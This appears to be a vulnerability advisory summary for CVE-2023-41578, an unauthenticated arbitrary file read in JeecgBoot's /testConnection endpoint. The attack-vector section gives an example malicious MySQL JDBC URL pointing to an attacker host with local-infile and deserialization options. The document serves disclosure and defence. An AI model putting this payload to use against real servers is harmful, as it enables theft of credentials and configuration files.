CVE-2023-41578

Vulnerability

Description

CVE-2023-41578 is an arbitrary file read vulnerability in JeecgBoot versions up to v3.5.3. The flaw exists in the /testConnection endpoint, which is used to test database connections. The application constructs a JDBC connection string from user-supplied input without proper sanitization, allowing an attacker to leverage the MySQL Connector/J's ability to read local files via the LOAD DATA LOCAL INFILE or similar mechanisms.

Attack

Vector

An attacker can exploit this by sending a crafted POST request to /testConnection with a malicious dbUrl parameter that includes a MySQL connection string designed to read arbitrary files from the server (e.g., jdbc:mysql://attacker.com/test?allowLoadLocalInfile=true&autoDeserialize=true). The attack does not require authentication and can be performed remotely if the application is accessible. The GitHub issue [2] provides a detailed proof-of-concept.

Impact

Successful exploitation allows an attacker to read sensitive files from the server, such as configuration files, credentials, or application source code, potentially leading to further compromise of the system. The vulnerability is categorized as high severity due to the ease of exploitation and the potential for data disclosure.

Mitigation

As of the advisory, JeecgBoot has not released an official patch for this specific version. Users are advised to upgrade to a later version (e.g., v3.5.4 or higher) once available, or restrict access to the /testConnection endpoint to trusted networks. The vulnerability has been publicly disclosed, and exploitation may be possible if the application remains unpatched [1][3].